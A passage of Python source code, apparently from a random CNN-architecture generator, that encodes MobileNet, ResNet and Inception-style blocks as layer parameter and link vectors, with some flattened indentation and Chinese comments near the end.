                    self.layer_id += [7]
                    self.layer_num += 1
                    last_layer_input_size = output_size
                    last_block_input_size = last_layer_input_size
                # FC layer (id 21) mapping the flattened features to 1000 outputs
                input_length = last_block_input_size[1] * last_block_input_size[2] * last_block_input_size[3]
                params = self.make_layer(21,[1,input_length],[1,1000])
                self.layer_parameters += params
                link_list=[self.layer_num-1]
                self.layer_link += self.get_link_vector(link_list,self.layer_num)
                self.layer_id += [21]
                self.layer_num += 1
def make_block(self,input_size,output_size,last_block_index,max_branch_layer,branch_prob = 0.1):
    '''
    Append one backbone block chosen at random from well-known CNN templates.

    input_size: size received from the previous block
    output_size: desired output size of this block
    max_branch_layer: maximum number of layers per branch
    branch_prob: probability of one extra branch (two extra = branch_prob**2, ...)

    Layers inside a block only connect to other layers of the same block;
    blocks never contain FC layers. The usual ordering is
        Conv2d -> BatchNorm2d -> ReLU -> MaxPool2d
    possibly with additional Conv/Pool layers before or after. For concat
    nodes the channel counts may differ; for add nodes all shapes must match.

    Returns (index of the block's last node, output size of the block).
    '''
    in_channel,in_height = input_size[1],input_size[2]
    out_height = output_size[2]
    if in_height == 224:
        # stem: 224 input is reduced by a dedicated stem template
        choose = 0
        if out_height == 112:
            choose = 11
            return_index,out_size = self.make_conv_bn(last_block_index,input_size,output_size)
        elif out_height == 56:
            if random.randint(0,100) < 50:
                choose = 21
                return_index,out_size = self.make_inceptionV1_pre(last_block_index,input_size,output_size)
            else:
                choose = 22
                return_index,out_size = self.make_resnet_pre(last_block_index,input_size,output_size)
    elif out_height == in_height:
        # resolution-preserving block: pick a stride-1 template
        choose = random.randint(0,96)
        if choose < 16:
            choose = 1
            return_index,out_size = self.make_conv_dw(last_block_index,input_size,output_size)
        elif choose < 32:
            choose = 2
            return_index,out_size = self.make_InversedResidual(last_block_index,input_size,output_size)
        elif choose < 48:
            choose = 3
            return_index,out_size = self.make_resnet18_block(last_block_index,input_size,output_size)
        elif choose < 64:
            choose = 4
            return_index,out_size = self.make_MobileNetV3_block(last_block_index,input_size,output_size)
        elif choose < 80:
            choose = 5
            return_index,out_size = self.make_resnet50_block(last_block_index,input_size,output_size)
        else:
            choose = 6
            return_index,out_size = self.make_inceptionV1_block(last_block_index,input_size,output_size)
    elif in_height == 2*out_height:
        # downsampling block: pick a stride-2 template
        choose = random.randint(0,112)
        if choose < 16:
            choose = 1
            return_index,out_size = self.make_conv_dw(last_block_index,input_size,output_size)
        elif choose < 32:
            choose = 2
            return_index,out_size = self.make_InversedResidual(last_block_index,input_size,output_size)
        elif choose < 48:
            choose = 3
            return_index,out_size = self.make_resnet18_block(last_block_index,input_size,output_size)
        elif choose < 64:
            choose = 4
            return_index,out_size = self.make_MobileNetV3_block(last_block_index,input_size,output_size)
        elif choose < 80:
            choose = 5
            return_index,out_size = self.make_inceptionV1_block2(last_block_index,input_size,output_size)
        elif choose < 96:
            choose = 6
            return_index,out_size = self.make_resnet50_block(last_block_index,input_size,output_size)
        else :
            choose = 7
            return_index,out_size = self.make_inceptionV1_block(last_block_index,input_size,output_size)
    # the helpers appended their layers, so the block's tail is the newest node
    return self.layer_num - 1,out_size
def make_conv_bn(self,last_block_index,input_size,final_output_size):
    '''
    Emit the MobileNet-v1 stem convolution:
        nn.Conv2d(inp, oup, kernel_size=3, stride=2, padding=1, bias=False)
        nn.BatchNorm2d(oup)
        nn.ReLU(inplace=True)
    Halves the spatial resolution (input_h = 2 * output_h).
    Returns (index of the last emitted node, its output size).
    '''
    last_layer_input_size = input_size
    # 1) 3x3 stride-2 convolution (id 1) with 32..48 output channels
    in_channel = input_size[1]
    out_channel = random.randint(32,48)
    conv_params = [in_channel,out_channel, 3,3, 2,2, 1,1, 1,1, 1]
    params = input_size + [0,0,0,0] + conv_params
    output_size = self.get_output_size(params,1,input_size)
    params = input_size + output_size + conv_params
    self.layer_parameters += params
    link_list=[last_block_index]
    self.layer_link += self.get_link_vector(link_list,self.layer_num)
    self.layer_id += [1]
    self.layer_num += 1
    last_layer_input_size = output_size
    # 2) BatchNorm (id 16)
    params = self.make_layer(16,last_layer_input_size)
    self.layer_parameters += params
    link_list=[self.layer_num-1]
    self.layer_link += self.get_link_vector(link_list,self.layer_num)
    self.layer_id += [16]
    self.layer_num += 1
    # 3) ReLU (id 22); the parameter vector stores a flattened activation length
    length = last_layer_input_size[1]
    # NOTE(review): spatial dims come from input_size, not last_layer_input_size -- confirm intended
    for i in range(2,len(input_size)):
        length *= input_size[i]
    params = [1,length] + [0,0,1,0]
    self.layer_parameters += params
    link_list=[self.layer_num-1]
    self.layer_link += self.get_link_vector(link_list,self.layer_num)
    self.layer_id += [22]
    self.layer_num += 1
    return self.layer_num - 1, last_layer_input_size  # index of this linear sequence's last node
def make_conv_dw(self,last_block_index,input_size,final_output_size):
    '''
    Emit the MobileNet-v1 depthwise-separable convolution block:
        nn.Conv2d(inp, inp, kernel_size=3, stride=1 or 2, padding=1, groups=inp, bias=False)
        nn.BatchNorm2d(inp)
        nn.ReLU(inplace=True)
        nn.Conv2d(inp, oup, kernel_size=1, stride=1, padding=0, bias=False)
        nn.BatchNorm2d(oup)
        nn.ReLU(inplace=True)
    stride = 1 -> input_h == output_h; stride = 2 -> input_h == 2 * output_h.
    Returns (index of the last emitted node, its output size).
    '''
    last_layer_input_size = input_size
    in_channel,in_height = input_size[1],input_size[2]
    out_channel = random.randint(in_channel,in_channel*2)
    if out_channel > 1000:
        # too wide: shrink instead of growing further
        out_channel = self.prob_random([int(in_channel/2),int(in_channel/3)],[0.8,0.2])
    # 1) 3x3 depthwise convolution (groups == in_channel)
    out_height = final_output_size[2]
    if in_height == out_height:
        stride = 1
    elif in_height == 2 *out_height:
        stride = 2
    else:
        print('wrong')
    conv_params = [in_channel,in_channel, 3,3, stride,stride, 1,1, 1,1, in_channel]
    params = input_size + [0,0,0,0] + conv_params
    output_size = self.get_output_size(params,1,input_size)
    params = input_size + output_size + conv_params
    self.layer_parameters += params
    link_list=[last_block_index]
    self.layer_link += self.get_link_vector(link_list,self.layer_num)
    self.layer_id += [1]
    self.layer_num += 1
    last_layer_input_size = output_size
    # 2) BatchNorm (id 16)
    params = self.make_layer(16,last_layer_input_size)
    self.layer_parameters += params
    link_list=[self.layer_num-1]
    self.layer_link += self.get_link_vector(link_list,self.layer_num)
    self.layer_id += [16]
    self.layer_num += 1
    # 3) ReLU (id 22)
    length = last_layer_input_size[1]
    for i in range(2,len(input_size)):
        length *= input_size[i]
    params = [1,length] + [0,0,1,0]
    self.layer_parameters += params
    link_list=[self.layer_num-1]
    self.layer_link += self.get_link_vector(link_list,self.layer_num)
    self.layer_id += [22]
    self.layer_num += 1
    # 4) 1x1 pointwise convolution projecting to out_channel
    conv_params = [in_channel,out_channel, 1,1, 1,1, 0,0, 1,1, 1]
    params = last_layer_input_size + [0,0,0,0] + conv_params
    output_size = self.get_output_size(params,1,last_layer_input_size)
    params = last_layer_input_size + output_size + conv_params
    self.layer_parameters += params
    link_list=[self.layer_num-1]
    self.layer_link += self.get_link_vector(link_list,self.layer_num)
    self.layer_id += [1]
    self.layer_num += 1
    last_layer_input_size = output_size
    # 5) BatchNorm (id 16)
    params = self.make_layer(16,last_layer_input_size)
    self.layer_parameters += params
    link_list=[self.layer_num-1]
    self.layer_link += self.get_link_vector(link_list,self.layer_num)
    self.layer_id += [16]
    self.layer_num += 1
    # 6) ReLU (id 22)
    length = last_layer_input_size[1]
    for i in range(2,len(input_size)):
        length *= input_size[i]
    params = [1,length] + [0,0,1,0]
    self.layer_parameters += params
    link_list=[self.layer_num-1]
    self.layer_link += self.get_link_vector(link_list,self.layer_num)
    self.layer_id += [22]
    self.layer_num += 1
    return self.layer_num - 1,last_layer_input_size  # index of this linear sequence's last node
def make_InversedResidual(self,last_block_index,input_size,final_output_size):
    '''
    Emit the MobileNet-v2 inverted-residual block (usable for out_channel < 400).

    stride = 2 (input_h = 2 * output_h):
        Conv2d(inp, inp, 3, stride=2, padding=1, groups=inp, bias=False)
        BatchNorm2d(inp) -> ReLU6
        Conv2d(inp, oup, 1, stride=1, padding=0, bias=False)
        BatchNorm2d(oup)
    stride = 1 (input_h = output_h):
        Conv2d(inp, hidden_dim, 1, bias=False) -> BatchNorm2d -> ReLU6
        Conv2d(hidden_dim, hidden_dim, 3, padding=1, groups=hidden_dim, bias=False)
        BatchNorm2d -> ReLU6
        Conv2d(hidden_dim, oup, 1, bias=False) -> BatchNorm2d
        (+ residual add when in_channel == out_channel)
    Returns (index of the last emitted node, its output size).
    '''
    last_layer_input_size = input_size
    in_channel,in_height = input_size[1],input_size[2]
    out_channel = random.randint(in_channel,in_channel*2)
    if out_channel > 1000:
        # too wide: shrink instead of growing further
        out_channel = self.prob_random([int(in_channel/2),int(in_channel/3)],[0.8,0.2])
    out_height = final_output_size[2]
    if in_height == out_height:
        stride = 1
        # 1) 1x1 expansion convolution
        res = self.layer_num - 1  # remember the block input for the residual add
        hidden_dim = in_channel * 6
        if hidden_dim > 1000:
            hidden_dim = in_channel * 3
        conv_params = [in_channel,hidden_dim, 1,1, 1,1, 0,0, 1,1, 1]
        params = input_size + [0,0,0,0] + conv_params
        output_size = self.get_output_size(params,1,input_size)
        params = input_size + output_size + conv_params
        self.layer_parameters += params
        link_list=[last_block_index]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [1]
        self.layer_num += 1
        last_layer_input_size = output_size
        # 2) BatchNorm (id 16)
        params = self.make_layer(16,last_layer_input_size)
        self.layer_parameters += params
        link_list=[self.layer_num-1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [16]
        self.layer_num += 1
        # 3) ReLU (id 22)
        length = last_layer_input_size[1]
        for i in range(2,len(input_size)):
            length *= input_size[i]
        params = [1,length] + [0,0,1,0]
        self.layer_parameters += params
        link_list=[self.layer_num-1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [22]
        self.layer_num += 1
        # 4) 3x3 depthwise convolution (groups == hidden_dim)
        conv_params = [hidden_dim,hidden_dim, 3,3, 1,1, 1,1, 1,1, hidden_dim]
        params = last_layer_input_size + [0,0,0,0] + conv_params
        output_size = self.get_output_size(params,1,last_layer_input_size)
        params = last_layer_input_size + output_size + conv_params
        self.layer_parameters += params
        link_list=[self.layer_num-1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [1]
        self.layer_num += 1
        last_layer_input_size = output_size
        # 5) BatchNorm (id 16)
        params = self.make_layer(16,last_layer_input_size)
        self.layer_parameters += params
        link_list=[self.layer_num-1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [16]
        self.layer_num += 1
        # 6) ReLU (id 22)
        length = last_layer_input_size[1]
        for i in range(2,len(input_size)):
            length *= input_size[i]
        params = [1,length] + [0,0,1,0]
        self.layer_parameters += params
        link_list=[self.layer_num-1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [22]
        self.layer_num += 1
        # 7) 1x1 projection convolution back to out_channel
        conv_params = [hidden_dim,out_channel, 1,1, 1,1, 0,0, 1,1, 1]
        params = last_layer_input_size + [0,0,0,0] + conv_params
        output_size = self.get_output_size(params,1,last_layer_input_size)
        params = last_layer_input_size + output_size + conv_params
        self.layer_parameters += params
        link_list=[self.layer_num-1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [1]
        self.layer_num += 1
        last_layer_input_size = output_size
        # 8) BatchNorm (id 16)
        params = self.make_layer(16,last_layer_input_size)
        self.layer_parameters += params
        link_list=[self.layer_num-1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [16]
        self.layer_num += 1
        # residual connection only when the shape is preserved
        if in_channel == out_channel :
            add_index_list = [res,self.layer_num-1]
            params = self.make_layer(24,last_layer_input_size,add_num=len(add_index_list))
            self.layer_parameters += params
            self.layer_link += self.get_link_vector(add_index_list,self.layer_num)
            self.layer_id += [24]
            self.layer_num += 1
    elif in_height == 2 *out_height:
        stride = 2
        # 1) 3x3 stride-2 depthwise convolution (groups == in_channel)
        conv_params = [in_channel,in_channel, 3,3, stride,stride, 1,1, 1,1, in_channel]
        params = input_size + [0,0,0,0] + conv_params
        output_size = self.get_output_size(params,1,input_size)
        params = input_size + output_size + conv_params
        self.layer_parameters += params
        link_list=[last_block_index]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [1]
        self.layer_num += 1
        last_layer_input_size = output_size
        # 2) BatchNorm (id 16)
        params = self.make_layer(16,last_layer_input_size)
        self.layer_parameters += params
        link_list=[self.layer_num-1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [16]
        self.layer_num += 1
        # 3) ReLU (id 22)
        length = last_layer_input_size[1]
        for i in range(2,len(input_size)):
            length *= input_size[i]
        params = [1,length] + [0,0,1,0]
        self.layer_parameters += params
        link_list=[self.layer_num-1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [22]
        self.layer_num += 1
        # 4) 1x1 pointwise convolution projecting to out_channel
        conv_params = [in_channel,out_channel, 1,1, 1,1, 0,0, 1,1, 1]
        params = last_layer_input_size + [0,0,0,0] + conv_params
        output_size = self.get_output_size(params,1,last_layer_input_size)
        params = last_layer_input_size + output_size + conv_params
        self.layer_parameters += params
        link_list=[self.layer_num-1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [1]
        self.layer_num += 1
        last_layer_input_size = output_size
        # 5) BatchNorm (id 16)
        params = self.make_layer(16,last_layer_input_size)
        self.layer_parameters += params
        link_list=[self.layer_num-1]
        self.layer_link += self.get_link_vector(link_list,self.layer_num)
        self.layer_id += [16]
        self.layer_num += 1
    else:
        print('wrong')
    return self.layer_num - 1,last_layer_input_size  # index of this linear sequence's last node
    def make_MobileNetV3_block(self,last_block_index,input_size,final_output_size):
        '''
        Append one MobileNetV3-style inverted-residual block to the encoded graph:
        1x1 expand conv -> BN -> ReLU -> 3x3 depthwise conv -> BN -> optional
        SE module -> ReLU -> 1x1 project conv -> BN [-> residual add when the
        channel count is preserved].

        Reference module dumps:
        IN = 2 OUT  (stride-2 variant)
        (conv): Sequential(
        (0): Conv2d(16, 16, kernel_size=(1, 1), stride=(1, 1), bias=False)
        (1): BatchNorm2d(16, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        (2): ReLU(inplace=True)
        (3): Conv2d(16, 16, kernel_size=(3, 3), stride=(2, 2), padding=(1, 1), groups=16, bias=False)
        (4): BatchNorm2d(16, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        (5): SEModule(
        (avg_pool): AdaptiveAvgPool2d(output_size=1)
        (fc): Sequential(
        (0): Linear(in_features=16, out_features=4, bias=False)
        (1): ReLU(inplace=True)
        (2): Linear(in_features=4, out_features=16, bias=False)
        (3): Hsigmoid()
        )
        )
        (6): ReLU(inplace=True)
        (7): Conv2d(16, 16, kernel_size=(1, 1), stride=(1, 1), bias=False)
        (8): BatchNorm2d(16, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        )
        )
        IN = OUT  (stride-1 variant)
        (conv): Sequential(
        (0): Conv2d(24, 88, kernel_size=(1, 1), stride=(1, 1), bias=False)
        (1): BatchNorm2d(88, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        (2): ReLU(inplace=True)
        (3): Conv2d(88, 88, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), groups=88, bias=False)
        (4): BatchNorm2d(88, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        (5): Identity()
        (6): ReLU(inplace=True)
        (7): Conv2d(88, 24, kernel_size=(1, 1), stride=(1, 1), bias=False)
        (8): BatchNorm2d(24, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
        )
        )

        Parameters:
            last_block_index: node index this block connects from.
            input_size: NCHW size of the incoming tensor.
            final_output_size: target NCHW size; its height selects stride 1 vs 2.
        Returns:
            (index of the last appended node of this linear sequence, its output size).
        '''
        last_layer_input_size = input_size
        in_channel,in_height = input_size[1],input_size[2]
        # Randomly choose the block's output channels (20% chance of doubling).
        if random.randint(0,100) < 20:
            out_channel = int(in_channel*2)
        else:
            out_channel = random.randint(in_channel,int(in_channel*1.5))
        if out_channel > 1000:
            # Too wide — shrink instead (80%: /2, 20%: /3).
            out_channel = self.prob_random([int(in_channel/2),int(in_channel/3)],[0.8,0.2])
        out_height = final_output_size[2]
        # Expansion width of the inverted residual (3x-6x the input channels).
        hidden_dim = random.randint(in_channel*3,in_channel*6)
        if hidden_dim > 1000:
            hidden_dim = in_channel
        if in_height == out_height:
            stride = 1  # NOTE(review): assigned but never read below
            # add #1 conv2d (1x1 expand: in_channel -> hidden_dim)
            res = self.layer_num - 1  # block-input node index, reused by the residual add
            conv_params = [in_channel,hidden_dim, 1,1, 1,1, 0,0, 1,1, 1]
            params = input_size + [0,0,0,0] + conv_params
            output_size = self.get_output_size(params,1,input_size)
            params = input_size + output_size + conv_params
            self.layer_parameters += params # append to the parameter vector
            link_list=[last_block_index]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [1] # append to the layer-id list
            self.layer_num += 1
            last_layer_input_size = output_size
            # add #2 BN
            params = self.make_layer(16,last_layer_input_size)
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [16] # append to the layer-id list
            self.layer_num += 1
            # add #3 ReLU (element count: post-conv channels x input spatial dims;
            # spatial dims are unchanged here because conv #1 is 1x1 stride 1)
            length = last_layer_input_size[1]
            for i in range(2,len(input_size)):
                length *= input_size[i]
            params = [1,length] + [0,0,1,0]
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [22] # append to the layer-id list
            self.layer_num += 1
            # add #4 conv2d (3x3 depthwise, groups == hidden_dim)
            conv_params = [hidden_dim,hidden_dim, 3,3, 1,1, 1,1, 1,1, hidden_dim]
            params = last_layer_input_size + [0,0,0,0] + conv_params
            output_size = self.get_output_size(params,1,last_layer_input_size)
            params = last_layer_input_size + output_size + conv_params
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [1] # append to the layer-id list
            self.layer_num += 1
            last_layer_input_size = output_size
            # add #5 BN
            params = self.make_layer(16,last_layer_input_size)
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [16] # append to the layer-id list
            self.layer_num += 1
            before_le_input_size = last_layer_input_size
            before_le = self.layer_num - 1  # node feeding both the SE branch and ReLU #6
            # optionally add an SEModule branch (50% probability)
            if random.randint(0,100)<50:
                # add AvgPool (kernel spans the whole feature map, i.e. global pooling)
                kernel_size = last_layer_input_size[2]
                pooling_params = [kernel_size,kernel_size, 1,1, 0,0, 1,1, 1]
                params = last_layer_input_size + [0,0,0,0] + pooling_params
                output_size = self.get_output_size(params,7,last_layer_input_size)
                params = last_layer_input_size + output_size + pooling_params
                self.layer_parameters += params # append to the parameter vector
                link_list = [self.layer_num-1]
                self.layer_link += self.get_link_vector(link_list,self.layer_num)
                self.layer_id += [7] # append to the layer-id list
                self.layer_num += 1
                last_layer_input_size = output_size
                # add Linear (squeeze: hidden_dim -> hidden_dim/4)
                linear_hidden = int(hidden_dim/4)
                input_length = last_layer_input_size[1] * last_layer_input_size[2] * last_layer_input_size[3]
                params = self.make_layer(21,[1,input_length],[1,linear_hidden])
                self.layer_parameters += params # append to the parameter vector
                link_list=[self.layer_num-1]
                self.layer_link += self.get_link_vector(link_list,self.layer_num)
                self.layer_id += [21] # append to the layer-id list
                self.layer_num += 1
                # add ReLU
                length = linear_hidden
                params = [1,length] + [0,0,1,0]
                self.layer_parameters += params # append to the parameter vector
                link_list=[self.layer_num-1]
                self.layer_link += self.get_link_vector(link_list,self.layer_num)
                self.layer_id += [22] # append to the layer-id list
                self.layer_num += 1
                # add Linear (excite: hidden_dim/4 -> hidden_dim)
                params = self.make_layer(21,[1,linear_hidden],[1,hidden_dim])
                self.layer_parameters += params # append to the parameter vector
                link_list=[self.layer_num-1]
                self.layer_link += self.get_link_vector(link_list,self.layer_num)
                self.layer_id += [21] # append to the layer-id list
                self.layer_num += 1
                # add Sigmoid (activation flags [1,0,0,0], vs ReLU's [0,0,1,0])
                length = hidden_dim
                params = [1,hidden_dim] + [1,0,0,0]
                self.layer_parameters += params # append to the parameter vector
                link_list=[self.layer_num-1]
                self.layer_link += self.get_link_vector(link_list,self.layer_num)
                self.layer_id += [22] # append to the layer-id list
                self.layer_num += 1
            # add #6 ReLU
            # NOTE(review): this node links back to the BN *before* the SE branch
            # (before_le), so the SE sub-path's output is never consumed downstream
            # — confirm this matches the intended graph encoding.
            length = before_le_input_size[1]
            for i in range(2,len(before_le_input_size)):
                length *= before_le_input_size[i]
            params = [1,length] + [0,0,1,0]
            self.layer_parameters += params # append to the parameter vector
            link_list=[before_le]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [22] # append to the layer-id list
            self.layer_num += 1
            # add #7 conv2d (1x1 project: hidden_dim -> out_channel)
            conv_params = [hidden_dim,out_channel, 1,1, 1,1, 0,0, 1,1, 1]
            params = before_le_input_size + [0,0,0,0] + conv_params
            output_size = self.get_output_size(params,1,before_le_input_size)
            params = before_le_input_size + output_size + conv_params
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [1] # append to the layer-id list
            self.layer_num += 1
            last_layer_input_size = output_size
            # add #8 BN
            params = self.make_layer(16,last_layer_input_size)
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [16] # append to the layer-id list
            self.layer_num += 1
            # add the residual connection (only when channels are preserved)
            if in_channel == out_channel :
                add_index_list = [res,self.layer_num-1]
                params = self.make_layer(24,last_layer_input_size,add_num=len(add_index_list))
                self.layer_parameters += params # append to the parameter vector
                self.layer_link += self.get_link_vector(add_index_list,self.layer_num)
                self.layer_id += [24] # append to the layer-id list
                self.layer_num += 1
        elif in_height == 2 *out_height:
            stride = 2  # NOTE(review): assigned but never read below
            # add #1 conv2d (1x1 expand: in_channel -> hidden_dim)
            conv_params = [in_channel,hidden_dim, 1,1, 1,1, 0,0, 1,1, 1]
            params = input_size + [0,0,0,0] + conv_params
            output_size = self.get_output_size(params,1,input_size)
            params = input_size + output_size + conv_params
            self.layer_parameters += params # append to the parameter vector
            link_list=[last_block_index]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [1] # append to the layer-id list
            self.layer_num += 1
            last_layer_input_size = output_size
            # add #2 BN
            params = self.make_layer(16,last_layer_input_size)
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [16] # append to the layer-id list
            self.layer_num += 1
            # add #3 ReLU (spatial dims unchanged by the 1x1 stride-1 conv above)
            length = last_layer_input_size[1]
            for i in range(2,len(input_size)):
                length *= input_size[i]
            params = [1,length] + [0,0,1,0]
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [22] # append to the layer-id list
            self.layer_num += 1
            # add #4 conv2d (3x3 depthwise, stride 2, groups == hidden_dim)
            conv_params = [hidden_dim,hidden_dim, 3,3, 2,2, 1,1, 1,1, hidden_dim]
            params = last_layer_input_size + [0,0,0,0] + conv_params
            output_size = self.get_output_size(params,1,last_layer_input_size)
            params = last_layer_input_size + output_size + conv_params
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [1] # append to the layer-id list
            self.layer_num += 1
            last_layer_input_size = output_size
            # add #5 BN
            params = self.make_layer(16,last_layer_input_size)
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [16] # append to the layer-id list
            self.layer_num += 1
            before_le_input_size = last_layer_input_size
            before_le = self.layer_num - 1  # node feeding both the SE branch and ReLU #6
            # optionally add an SEModule branch (50% probability)
            if random.randint(0,100)<50:
                # add AvgPool (kernel spans the whole feature map, i.e. global pooling)
                kernel_size = last_layer_input_size[2]
                pooling_params = [kernel_size,kernel_size, 1,1, 0,0, 1,1, 1]
                params = last_layer_input_size + [0,0,0,0] + pooling_params
                output_size = self.get_output_size(params,7,last_layer_input_size)
                params = last_layer_input_size + output_size + pooling_params
                self.layer_parameters += params # append to the parameter vector
                link_list = [self.layer_num-1]
                self.layer_link += self.get_link_vector(link_list,self.layer_num)
                self.layer_id += [7] # append to the layer-id list
                self.layer_num += 1
                last_layer_input_size = output_size
                # add Linear (squeeze: hidden_dim -> hidden_dim/4)
                linear_hidden = int(hidden_dim/4)
                input_length = last_layer_input_size[1] * last_layer_input_size[2] * last_layer_input_size[3]
                params = self.make_layer(21,[1,input_length],[1,linear_hidden])
                self.layer_parameters += params # append to the parameter vector
                link_list=[self.layer_num-1]
                self.layer_link += self.get_link_vector(link_list,self.layer_num)
                self.layer_id += [21] # append to the layer-id list
                self.layer_num += 1
                # add ReLU
                length = linear_hidden
                params = [1,length] + [0,0,1,0]
                self.layer_parameters += params # append to the parameter vector
                link_list=[self.layer_num-1]
                self.layer_link += self.get_link_vector(link_list,self.layer_num)
                self.layer_id += [22] # append to the layer-id list
                self.layer_num += 1
                # add Linear (excite: hidden_dim/4 -> hidden_dim)
                params = self.make_layer(21,[1,linear_hidden],[1,hidden_dim])
                self.layer_parameters += params # append to the parameter vector
                link_list=[self.layer_num-1]
                self.layer_link += self.get_link_vector(link_list,self.layer_num)
                self.layer_id += [21] # append to the layer-id list
                self.layer_num += 1
                # add Sigmoid (activation flags [1,0,0,0], vs ReLU's [0,0,1,0])
                length = hidden_dim
                params = [1,hidden_dim] + [1,0,0,0]
                self.layer_parameters += params # append to the parameter vector
                link_list=[self.layer_num-1]
                self.layer_link += self.get_link_vector(link_list,self.layer_num)
                self.layer_id += [22] # append to the layer-id list
                self.layer_num += 1
            # add #6 ReLU
            # NOTE(review): links back to the BN before the SE branch (before_le),
            # so the SE sub-path's output is never consumed — confirm intended.
            length = before_le_input_size[1]
            for i in range(2,len(before_le_input_size)):
                length *= before_le_input_size[i]
            params = [1,length] + [0,0,1,0]
            self.layer_parameters += params # append to the parameter vector
            link_list=[before_le]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [22] # append to the layer-id list
            self.layer_num += 1
            # add #7 conv2d (1x1 project: hidden_dim -> out_channel)
            conv_params = [hidden_dim,out_channel, 1,1, 1,1, 0,0, 1,1, 1]
            params = before_le_input_size + [0,0,0,0] + conv_params
            output_size = self.get_output_size(params,1,before_le_input_size)
            params = before_le_input_size + output_size + conv_params
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [1] # append to the layer-id list
            self.layer_num += 1
            last_layer_input_size = output_size
            # add #8 BN (no residual add in the stride-2 variant)
            params = self.make_layer(16,last_layer_input_size)
            self.layer_parameters += params # append to the parameter vector
            link_list=[self.layer_num-1]
            self.layer_link += self.get_link_vector(link_list,self.layer_num)
            self.layer_id += [16] # append to the layer-id list
            self.layer_num += 1
        else:
            print('wrong')
        #print('make_InversedResidual',last_layer_input_size)
        return self.layer_num - 1,last_layer_input_size # return the index of the last node of this linear sequence
def make_resnet_pre(self,last_block_index,input_size,final_output_size):
'''
实现ResNet最初的pre层
(0): Conv2d(3, hidden, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3))
(1): BatchNorm2d(hidden)
(2): ReLU(inplace=True)
(3): MaxPool2d(kernel_size=3, stride=2, padding=1, dilation=1)
out:torch.Size([1, 64, 56, 56])
'''
last_layer_input_size = input_size
#加入 #1 conv2d
in_channel = input_size[1]
out_channel = 64
conv_params = [in_channel,out_channel, 7,7, 2,2, 3,3, 1,1, 1]
params = input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,input_size)
params = input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 #2 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 #3 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
#加入 #4 pooling
pooling_params = [3,3, 2,2, 1,1, 1,1, 0]
params = last_layer_input_size + [0,0,0,0] + pooling_params
output_size = self.get_output_size(params,7,last_layer_input_size)
params = last_layer_input_size + output_size + pooling_params
self.layer_parameters += params #加入参数向量中
link_list = [self.layer_num-1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [7] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#('resnetpre',last_layer_input_size)
